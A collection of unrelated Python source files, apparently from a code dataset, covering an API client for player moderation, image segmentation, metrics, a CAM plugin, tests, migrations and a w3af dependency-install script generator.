asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_player_moderation(player_moderation_id, async_req=True)
>>> result = thread.get()
Args:
player_moderation_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Success
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['player_moderation_id'] = \
player_moderation_id
return self.delete_player_moderation_endpoint.call_with_http_info(**kwargs)
def get_player_moderation(
self,
player_moderation_id,
**kwargs
):
"""Get Player Moderation # noqa: E501
Returns a single Player Moderation. This returns the exact same amount of information as the more generalised `getPlayerModerations`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_player_moderation(player_moderation_id, async_req=True)
>>> result = thread.get()
Args:
player_moderation_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PlayerModeration
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['player_moderation_id'] = \
player_moderation_id
return self.get_player_moderation_endpoint.call_with_http_info(**kwargs)
def get_player_moderations(
self,
**kwargs
):
"""Search Player Moderations # noqa: E501
Returns a list of all player moderations made by **you**. This endpoint does not have pagination, and will return *all* results. Use query parameters to limit your query if needed. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_player_moderations(async_req=True)
>>> result = thread.get()
Keyword Args:
type (str): Must be one of PlayerModerationType, except unblock. Unblocking simply removes a block.. [optional]
target_user_id (str): Must be valid UserID.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[PlayerModeration]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.get_player_moderations_endpoint.call_with_http_info(**kwargs)
def moderate_user(
self,
**kwargs
):
"""Moderate User # noqa: E501
Moderate a user, e.g. unmute them or show their avatar. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.moderate_user(async_req=True)
>>> result = thread.get()
Keyword Args:
moderate_user_request (ModerateUserRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PlayerModeration
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.moderate_user_endpoint.call_with_http_info(**kwargs)
def unmoderate_user(
self,
**kwargs
):
"""Unmoderate User # noqa: E501
Removes a player moderation previously added through `moderateUser`. E.g if you previously have shown their avatar, but now want to reset it to default. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unmoderate_user(async_req=True)
>>> result = thread.get()
Keyword Args:
moderate_user_request (ModerateUserRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Success
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.unmoderate_user_endpoint.call_with_http_info(**kwargs)
| StarcoderdataPython |
1715640 | # Important Imports
import numpy as np
from PIL import Image
from scipy.signal import find_peaks
# image = PIL.Image, n = Number of Segments
# ignoreBottomTop = Segmentation of top and bottom of Image
# axis = 0 (for vertical-lines) or 1 (for horizontal-lines)
# Returns a gray image, PIL Image.
def recursiveXYCut(image, n, ignoreBottomTop = True, axis = 1):
image = image.convert('L')
image_arr = np.asarray(image)
# distance for peaks
distance = image_arr.shape[0 if axis == 1 else 1]/n
# Sum the pixels along given axis
sum_vals = image_arr.sum(axis = axis)
# Get the indices of the peaks
peaks, _ = find_peaks(sum_vals, distance=distance)
# Temp variable to create segment lines i.e. 0 out the required values.
temp = np.ones(image_arr.shape)
# Skip top and bottom segmentation or not (depends on the param)
#for peak in peaks[1:-1 if ignoreBottomTop else ]:
for peak in peaks[1:-1] if ignoreBottomTop else peaks:
if axis == 1:
temp[range(peak-2, peak+2)] = 0
else:
temp[:, range(peak-2, peak+2)] = 0
return Image.fromarray(np.uint8(image_arr * temp))
| StarcoderdataPython |
47076 | <filename>ptt/page.py
import re
from .type import Url
from typing import Iterator, List
import urllib.parse as urlpasre
from abc import ABC, abstractmethod
class PageManager(ABC):
def __init__(self, start_url: Url) -> None:
self.start_url = start_url
@abstractmethod
def get_urls(self, search_page_num: int, **kwargs) -> Iterator[Url]:
pass
class DefaultPage(PageManager):
def set_page_indx(self, indx: int) -> None:
self._page_indx = indx
def get_page_indx(self) -> int:
return self._page_indx
def get_url(self, indx: int) -> Url:
url = re.sub(r'index.html', f'index{indx}.html', self.start_url)
return Url(url)
def get_urls(
self,
search_page_num: int,
**kwargs
) -> Iterator[Url]:
first_indx = self.get_page_indx()
for indx in range(first_indx, first_indx-search_page_num, -1):
yield self.get_url(indx)
class SearchPage(PageManager):
def get_url(self, indx: int, **kwargs) -> Url:
body_list: List[str] = []
for key in kwargs:
if key == 'author':
body_list.append(f"author:{kwargs[key]}")
elif key == 'keyword':
body_list.append(kwargs[key])
elif key == 'recommend':
# Search string effects the search results
body_list.insert(0, f"recommend:{kwargs[key]}")
search_url = urlpasre.urljoin(self.start_url, 'search')
url_parse = urlpasre.urlparse(search_url)
url_query = urlpasre.urlencode({
'page': str(indx),
'q': "\\+".join(body_list)
})
url = url_parse._replace(query=url_query).geturl()
return Url(url.replace('%5C%2B', '+'))
def get_urls(
self,
search_page_num: int,
**kwargs
) -> Iterator[Url]:
for indx in range(1, search_page_num+1):
yield self.get_url(indx, **kwargs)
| StarcoderdataPython |
105873 | <reponame>xiaolao/PaddleX
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from sklearn.metrics import hamming_loss
from sklearn.metrics import accuracy_score as accuracy_metric
from sklearn.metrics import multilabel_confusion_matrix
from sklearn.metrics import precision_recall_fscore_support
from sklearn.metrics import average_precision_score
from sklearn.preprocessing import binarize
import numpy as np
__all__ = [
"multi_hot_encode", "hamming_distance", "accuracy_score",
"precision_recall_fscore", "mean_average_precision"
]
def multi_hot_encode(logits, threshold=0.5):
"""
Encode logits to multi-hot by elementwise for multilabel
"""
return binarize(logits, threshold)
def hamming_distance(output, target):
"""
Soft metric based label for multilabel classification
Returns:
The smaller the return value is, the better model is.
"""
return hamming_loss(target, output)
def accuracy_score(output, target, base="sample"):
"""
Hard metric for multilabel classification
Args:
output:
target:
base: ["sample", "label"], default="sample"
if "sample", return metric score based sample,
if "label", return metric score based label.
Returns:
accuracy:
"""
assert base in ["sample", "label"], 'must be one of ["sample", "label"]'
if base == "sample":
accuracy = accuracy_metric(target, output)
elif base == "label":
mcm = multilabel_confusion_matrix(target, output)
tns = mcm[:, 0, 0]
fns = mcm[:, 1, 0]
tps = mcm[:, 1, 1]
fps = mcm[:, 0, 1]
accuracy = (sum(tps) + sum(tns)) / (
sum(tps) + sum(tns) + sum(fns) + sum(fps))
return accuracy
def precision_recall_fscore(output, target):
"""
Metric based label for multilabel classification
Returns:
precisions:
recalls:
fscores:
"""
precisions, recalls, fscores, _ = precision_recall_fscore_support(target,
output)
return precisions, recalls, fscores
def mean_average_precision(logits, target):
"""
Calculate average precision
Args:
logits: probability from network before sigmoid or softmax
target: ground truth, 0 or 1
"""
if not (isinstance(logits, np.ndarray) and isinstance(target, np.ndarray)):
raise TypeError("logits and target should be np.ndarray.")
aps = []
for i in range(target.shape[1]):
ap = average_precision_score(target[:, i], logits[:, i])
aps.append(ap)
return np.mean(aps)
| StarcoderdataPython |
3293913 | import torch
import torch.nn as nn
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class BaseModel(torch.nn.Module):
def load(self, path):
"""Load model from file.
Args:
path (str): file path
"""
parameters = torch.load(path, map_location=device)
if "optimizer" in parameters:
parameters = parameters["model"]
self.load_state_dict(parameters)
| StarcoderdataPython |
50871 | """
Copyright 2011 <NAME> <<EMAIL>>
This file is part of PyCAM.
PyCAM is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PyCAM is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PyCAM. If not, see <http://www.gnu.org/licenses/>.
"""
import pycam.Geometry.Model
import pycam.Plugins
import pycam.workspace.data_models
class ModelSupport(pycam.Plugins.PluginBase):
UI_FILE = "model_support.ui"
DEPENDS = ["Models"]
CATEGORIES = ["Model", "Support bridges"]
MODEL_NAME_TEMPLATE = "Support Model #%d"
def setup(self):
if self.gui:
self._support_frame = self.gui.get_object("ModelExtensionsFrame")
self._support_frame.unparent()
self.core.register_ui("model_handling", "Support", self._support_frame, 0)
support_model_type_selector = self.gui.get_object("SupportGridTypesControl")
self._gtk_handlers = []
self._gtk_handlers.append((support_model_type_selector, "changed",
"support-model-changed"))
def add_support_model_type(obj, name):
types_model = support_model_type_selector.get_model()
# the model is gone (for unknown reasons) when the GTK loop stops
if types_model is not None:
types_model.append((obj, name))
# enable the first item by default
if len(types_model) == 1:
support_model_type_selector.set_active(0)
def clear_support_model_type_selector():
model = support_model_type_selector.get_model()
# the model is gone (for unknown reasons) when the GTK loop stops
if model is not None:
model.clear()
def clear_support_model_settings():
children = container.get_children()
for child in children:
container.remove(child)
def get_support_model_type():
index = support_model_type_selector.get_active()
if index < 0:
return None
else:
selector_model = support_model_type_selector.get_model()
return selector_model[index][0]
def set_support_model_type(model_type):
selector_model = support_model_type_selector.get_model()
for index, row in enumerate(selector_model):
if row[0] == model_type:
support_model_type_selector.set_active(index)
break
else:
support_model_type_selector.set_active(-1)
self.core.register_ui_section("support_model_type_selector", add_support_model_type,
clear_support_model_type_selector)
self.core.register_ui("support_model_type_selector", "none", "none", weight=-100)
container = self.gui.get_object("SupportAddOnContainer")
self.core.register_ui_section(
"support_model_settings",
lambda obj, name: container.pack_start(obj, expand=False, fill=False, padding=0),
clear_support_model_settings)
# TODO: remove public settings
self.core.add_item("support_model_type", get_support_model_type,
set_support_model_type)
grid_thickness = self.gui.get_object("SupportGridThickness")
self._gtk_handlers.append((grid_thickness, "value-changed", "support-model-changed"))
self.core.add_item("support_grid_thickness", grid_thickness.get_value,
grid_thickness.set_value)
grid_height = self.gui.get_object("SupportGridHeight")
self._gtk_handlers.append((grid_height, "value-changed", "support-model-changed"))
self.core.add_item("support_grid_height", grid_height.get_value, grid_height.set_value)
self._gtk_handlers.append((self.gui.get_object("CreateSupportModel"), "clicked",
self._add_support_model))
# support grid defaults
self.core.set("support_grid_thickness", 0.5)
self.core.set("support_grid_height", 0.5)
self.core.set("support_grid_type", "none")
self.core.register_chain("get_draw_dimension", self.get_draw_dimension)
# handlers
self._event_handlers = (
("model-change-after", "support-model-changed"),
("bounds-changed", "support-model-changed"),
("model-selection-changed", "support-model-changed"),
("support-model-changed", self.update_support_model))
self.register_gtk_handlers(self._gtk_handlers)
self.register_event_handlers(self._event_handlers)
self._update_widgets()
return True
def teardown(self):
if self.gui:
self.unregister_event_handlers(self._event_handlers)
self.unregister_gtk_handlers(self._gtk_handlers)
self.core.unregister_chain("get_draw_dimension", self.get_draw_dimension)
self.core.unregister_ui("model_handling", self.gui.get_object("ModelExtensionsFrame"))
self.core.unregister_ui("support_model_type_selector", "none")
self.core.unregister_ui_section("support_model_settings")
self.core.unregister_ui_section("support_model_type_selector")
def _update_widgets(self):
models = self.core.get("models").get_selected()
if models:
self._support_frame.show()
else:
self._support_frame.hide()
grid_type = self.core.get("support_model_type")
details_box = self.gui.get_object("SupportGridDetailsBox")
# show/hide the common details (width/height)
# enable/disable the "create support model" button
create_button = self.gui.get_object("CreateSupportModel")
if grid_type == "none":
details_box.hide()
create_button.set_sensitive(False)
else:
details_box.show()
create_button.set_sensitive(True)
def _add_support_model(self, widget=None):
for model_object in self.core.get("current_support_models"):
self.core.get("models").add_model(model_object.get_dict(),
name_template=self.MODEL_NAME_TEMPLATE,
color=self.core.get("color_support_preview"))
# Disable the support model type -> avoid confusing visualization.
# (this essentially removes the support grid from the 3D view)
self.gui.get_object("SupportGridTypesControl").set_active(0)
def get_draw_dimension(self, low, high):
if not self.core.get("show_support_preview"):
return
support_model_objects = self.core.get("current_support_models", [])
support_models = []
for model_object in support_model_objects:
support_model = model_object.get_model()
if support_model:
support_models.append(support_model)
model_box = pycam.Geometry.Model.get_combined_bounds(support_models)
if model_box is None:
return
for index, (mlow, mhigh) in enumerate(zip(model_box.lower, model_box.upper)):
if (low[index] is None) or (mlow < low[index]):
low[index] = mlow
if (high[index] is None) or (mhigh > high[index]):
high[index] = mhigh
def update_support_model(self, widget=None):
old_support_model_objects = self.core.get("current_support_models")
selected_models = self.core.get("models").get_selected()
grid_type = self.core.get("support_model_type")
new_support_model_objects = []
if (grid_type == "none") or (not selected_models):
new_support_model_objects = []
else:
# update the support model
self.core.call_chain("get_support_models", selected_models, new_support_model_objects)
if old_support_model_objects != new_support_model_objects:
self.core.set("current_support_models", new_support_model_objects)
self.core.emit_event("visual-item-updated")
# show/hide controls
self._update_widgets()
| StarcoderdataPython |
3299075 | # -*- coding: utf-8 -*-
from mahjong.constants import CHUN, HAKU, HATSU
from mahjong.hand_calculating.yaku import Yaku
from mahjong.utils import is_pon, is_pair
class Shosangen(Yaku):
"""
Hand with two dragon pon sets and one dragon pair
"""
def __init__(self, yaku_id):
super(Shosangen, self).__init__(yaku_id)
def set_attributes(self):
self.tenhou_id = 30
self.name = '<NAME>'
self.english = 'Small Three Dragons'
self.han_open = 2
self.han_closed = 2
self.is_yakuman = False
def is_condition_met(self, hand, *args):
dragons = [CHUN, HAKU, HATSU]
count_of_conditions = 0
for item in hand:
# dragon pon or pair
if (is_pair(item) or is_pon(item)) and item[0] in dragons:
count_of_conditions += 1
return count_of_conditions == 3
| StarcoderdataPython |
3204055 | <filename>opencadd/tests/structure/test_pocket_base.py
"""
Tests for opencadd.structure.pocket.core
"""
import pytest
from opencadd.structure.pocket import PocketBase
class TestPocketBase:
"""
Test PocketBase class methods.
"""
@pytest.mark.parametrize(
"residue_ids, residue_ixs, residue_ids_formatted, residue_ixs_formatted",
[
([1, 2, 3], None, [1, 2, 3], [None, None, None]),
(["1", "2", "_", "_"], ["1", "2", "3", "4"], [1, 2, None, None], [1, 2, 3, 4]),
(["1", "2", None, None], ["1", "2", "3", "4"], [1, 2, None, None], [1, 2, 3, 4]),
],
)
def test_format_residue_ids_and_ixs(
self, residue_ids, residue_ixs, residue_ids_formatted, residue_ixs_formatted
):
"""
Test formatting of user-input residue PDB IDs and residue indices.
"""
base_pocket = PocketBase()
residue_ids2, residue_ixs2 = base_pocket._format_residue_ids_and_ixs(
residue_ids, residue_ixs, ""
)
assert residue_ids2 == residue_ids_formatted
assert residue_ixs2 == residue_ixs_formatted
@pytest.mark.parametrize(
"residue_ids, residue_ixs",
[
([1, 2, 3], [None, 2, 3]), # Non-int-castable index (None)
([1, 2, 3], ["a", 2, 3]), # Non-int-castable index
([1, 1, 2], None), # Duplicated PDB IDs
([1, 2, 3], [1, 1, 2]), # Duplicated indices
],
)
def test_format_residue_ids_and_ixs_raises(self, residue_ids, residue_ixs):
"""
Test error handling when formatting user-input residue PDB IDs and
residue indices.
"""
with pytest.raises((ValueError, TypeError)):
base_pocket = PocketBase()
base_pocket._format_residue_ids_and_ixs(residue_ids, residue_ixs, "")
@pytest.mark.parametrize(
"residue_ids, residue_ixs, n_residues",
[
([101, None], [1, 2], 2),
([101, None], [1, 2], 2),
([101, None], [None, None], 2),
],
)
def test_residues(self, residue_ids, residue_ixs, n_residues):
"""
Test property residues.
"""
base_pocket = PocketBase()
base_pocket._residue_ids = residue_ids
base_pocket._residue_ixs = residue_ixs
assert base_pocket.residues.columns.to_list() == ["residue.id", "residue.ix"]
assert (
base_pocket.residues.index.to_list()
== base_pocket.residues.reset_index().index.to_list()
)
assert base_pocket.residues.dtypes.to_list() == ["Int32", "Int32"]
assert len(base_pocket.residues) == n_residues
@pytest.mark.parametrize(
"residue_ids, residue_ixs, residue_id, residue_ix",
[
([101, None], [1, 2], 101, 1), # Residue ID+index exist
([101, None], [1, 2], 102, None), # Residue ID does not exist
([101, None], [None, None], 101, None), # Residue ID maps to None
],
)
def test_residue_id2ix(self, residue_ids, residue_ixs, residue_id, residue_ix):
"""
Test residue PDB ID to index mapping.
"""
base_pocket = PocketBase()
base_pocket._residue_ids = residue_ids
base_pocket._residue_ixs = residue_ixs
assert base_pocket._residue_id2ix(residue_id) == residue_ix
@pytest.mark.parametrize(
"residue_ids, residue_ixs, residue_ix, residue_id",
[
([101, None], [1, 2], 1, 101), # Residue index+ID exist
([101, None], [1, 2], 2, None), # Residue index maps to None
([101, 102], [1, 2], 10, None), # Residue index does not exist
],
)
def test_residue_ix2id(self, residue_ids, residue_ixs, residue_ix, residue_id):
"""
Test residue index to PDB ID mapping.
"""
base_pocket = PocketBase()
base_pocket._residue_ids = residue_ids
base_pocket._residue_ixs = residue_ixs
assert base_pocket._residue_ix2id(residue_ix) == residue_id
| StarcoderdataPython |
162789 | <reponame>sayantansatpati/disdat<filename>tests/functional/test_tags.py
import uuid
import pytest
from disdat import api, common
from disdat.pipe import PipeTask
TAGS = {'tag1': 'omg', 'tag2': 'it works'}
class Source(PipeTask):
def pipe_requires(self):
self.set_bundle_name('tagged')
def pipe_run(self):
self.add_tags(TAGS)
return 0
class Destination(PipeTask):
def pipe_requires(self):
self.set_bundle_name('output')
self.add_dependency('tagged', Source, params={})
def pipe_run(self, tagged):
tags = self.get_tags('tagged')
assert tags is not TAGS
assert tags == TAGS
return 1
@pytest.fixture
def context():
try:
print('ensuring disdat is initialized')
common.DisdatConfig.init()
except:
print('disdat already initialized, no worries...')
print('creating temporary local context')
context = uuid.uuid1().hex
api.context(context)
yield context
print('deleting temporary local context')
api.delete_context(context)
class TestContext:
def test_tags(self, context):
api.apply(context, Destination)
if __name__ == '__main__':
pytest.main([__file__])
| StarcoderdataPython |
3308813 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('filmfestival', '0011_auto_20150610_1401'),
]
operations = [
migrations.AddField(
model_name='day',
name='runtime',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='screening',
name='time',
field=models.TimeField(default=datetime.datetime(2015, 6, 10, 14, 54, 35, 375260)),
preserve_default=False,
),
]
| StarcoderdataPython |
1711505 | import numpy as np
from sklearn.preprocessing import normalize
from utils.data_utils import convert_dir_vec_to_pose, dir_vec_pairs
def convert_pose_to_line_segments(pose):
line_segments = np.zeros((len(dir_vec_pairs) * 2, 3))
for j, pair in enumerate(dir_vec_pairs):
line_segments[2 * j] = pose[pair[0]]
line_segments[2 * j + 1] = pose[pair[1]]
line_segments[:, [1, 2]] = line_segments[:, [2, 1]] # swap y, z
line_segments[:, 2] = -line_segments[:, 2]
return line_segments
def convert_dir_vec_to_line_segments(dir_vec):
joint_pos = convert_dir_vec_to_pose(dir_vec)
line_segments = np.zeros((len(dir_vec_pairs) * 2, 3))
for j, pair in enumerate(dir_vec_pairs):
line_segments[2 * j] = joint_pos[pair[0]]
line_segments[2 * j + 1] = joint_pos[pair[1]]
line_segments[:, [1, 2]] = line_segments[:, [2, 1]] # swap y, z
line_segments[:, 2] = -line_segments[:, 2]
return line_segments
| StarcoderdataPython |
3248621 | """
helper_script.py
Copyright 2013 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
import tempfile
from .utils import running_in_virtualenv
SCRIPT_NAME = 'w3af_dependency_install.sh'
def generate_helper_script(pkg_manager_cmd, os_packages, pip_cmd, failed_deps,
external_commands):
"""
Generates a helper script to be run by the user to install all the
dependencies.
:return: The path to the script name.
"""
temp_dir = tempfile.gettempdir()
script_path = os.path.join(temp_dir, SCRIPT_NAME)
script_file = file(script_path, 'w')
script_file.write('#!/bin/bash\n')
#
# Report the missing system packages
#
if os_packages:
missing_pkgs = ' '.join(os_packages)
script_file.write('%s %s\n' % (pkg_manager_cmd, missing_pkgs))
#
# Report all missing python modules
#
if failed_deps:
script_file.write('\n')
if running_in_virtualenv():
script_file.write('# Run without sudo to install inside venv\n')
not_git_pkgs = [fdep for fdep in failed_deps if not fdep.is_git]
git_pkgs = [fdep.git_src for fdep in failed_deps if fdep.is_git]
if not_git_pkgs:
cmd = generate_pip_install_non_git(pip_cmd, not_git_pkgs)
script_file.write('%s\n' % cmd)
if git_pkgs:
for missing_git_pkg in git_pkgs:
cmd = generate_pip_install_git(pip_cmd, missing_git_pkg)
script_file.write('%s\n' % cmd)
for cmd in external_commands:
script_file.write('%s\n' % cmd)
# Make it executable
os.chmod(script_path, 0755)
script_file.close()
return script_path
def generate_pip_install_non_git(pip_cmd, not_git_pkgs):
if running_in_virtualenv():
cmd_fmt = '%s install %s'
else:
cmd_fmt = 'sudo %s install %s'
install_specs = []
for fdep in not_git_pkgs:
install_specs.append('%s==%s' % (fdep.package_name,
fdep.package_version))
cmd = cmd_fmt % (pip_cmd, ' '.join(install_specs))
return cmd
def generate_pip_install_git(pip_cmd, git_pkg):
"""
:param pip_cmd: The pip command for this platform
:param git_pkg: The name of the pip+git package
:return: The command to be run to install the pip+git package
"""
if running_in_virtualenv():
cmd_fmt = '%s install --ignore-installed %s'
else:
cmd_fmt = 'sudo %s install --ignore-installed %s'
return cmd_fmt % (pip_cmd, git_pkg)
| StarcoderdataPython |
3244401 | <reponame>conradjones/ngraph-bridge
# ==============================================================================
# Copyright 2018-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""nGraph TensorFlow bridge floor operation test
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import numpy as np
import tensorflow as tf
from common import NgraphTest
class TestTanhOp(NgraphTest):
@pytest.mark.parametrize(("test_input", "expected"),
((1.4, np.tanh(1.4)), (0.5, np.tanh(0.5)),
(-0.3, np.tanh(-0.3))))
def test_tanh_1d(self, test_input, expected):
val = tf.placeholder(tf.float32, shape=(1,))
atol = 1e-5
out = tf.tanh(val)
sess_fn = lambda sess: sess.run((out,), feed_dict={val: (test_input,)})
result = self.with_ngraph(sess_fn)
assert np.amax(np.absolute(result[0] - expected)) < atol
def test_tanh_2d(self):
test_input = ((1.5, 2.5, 3.5), (4.5, 5.5, 6.5))
expected = np.tanh(test_input)
val = tf.placeholder(tf.float32, shape=(2, 3))
atol = 1e-5
out = tf.tanh(val)
sess_fn = lambda sess: sess.run((out,), feed_dict={val: test_input})
(result,) = self.with_ngraph(sess_fn)
assert np.amax(np.absolute(result == expected)) < atol
| StarcoderdataPython |
103620 | # -*- Mode:Python;indent-tabs-mode:nil; -*-
#
# File: psaExceptions.py
# Created: 05/09/2014
# Author: BSC
#
# Description:
# Custom execption class to manage error in the PSC
#
class psaExceptions( object ):
class confRetrievalFailed( Exception ):
pass
| StarcoderdataPython |
35874 |
class bcolors():
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OK = '\033[92m'
WARNING = '\033[96m'
FAIL = '\033[91m'
TITLE = '\033[93m'
ENDC = '\033[0m'
| StarcoderdataPython |
101676 | <reponame>AlleyDismay/The-Third-Element
from glob import glob
files = glob("*.py") + glob("Game/*.py")
files.remove("lineCt.py")
lines = 0
comments = 0
chars = 0
for f in files:
thing = open(f).read()
lines += thing.count("\n")
comments += thing.count("#")
print("%d Lines\n%d Files\nWithout comments %d"%(lines, len(files), lines-comments))
| StarcoderdataPython |
4837410 | <filename>checkout/migrations/0004_auto_20210801_1232.py
# Generated by Django 3.2.4 on 2021-08-01 12:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('checkout', '0003_order_addition'),
]
operations = [
migrations.AddField(
model_name='order',
name='original_bag',
field=models.TextField(default=''),
),
migrations.AddField(
model_name='order',
name='stripe_payment_id',
field=models.CharField(default='', max_length=300),
),
]
| StarcoderdataPython |
1729494 | from .implicit import *
from . import implicit
__all__ = implicit.__all__
| StarcoderdataPython |
1650171 | from behave import *
from src.sample.ISBN import ISBN
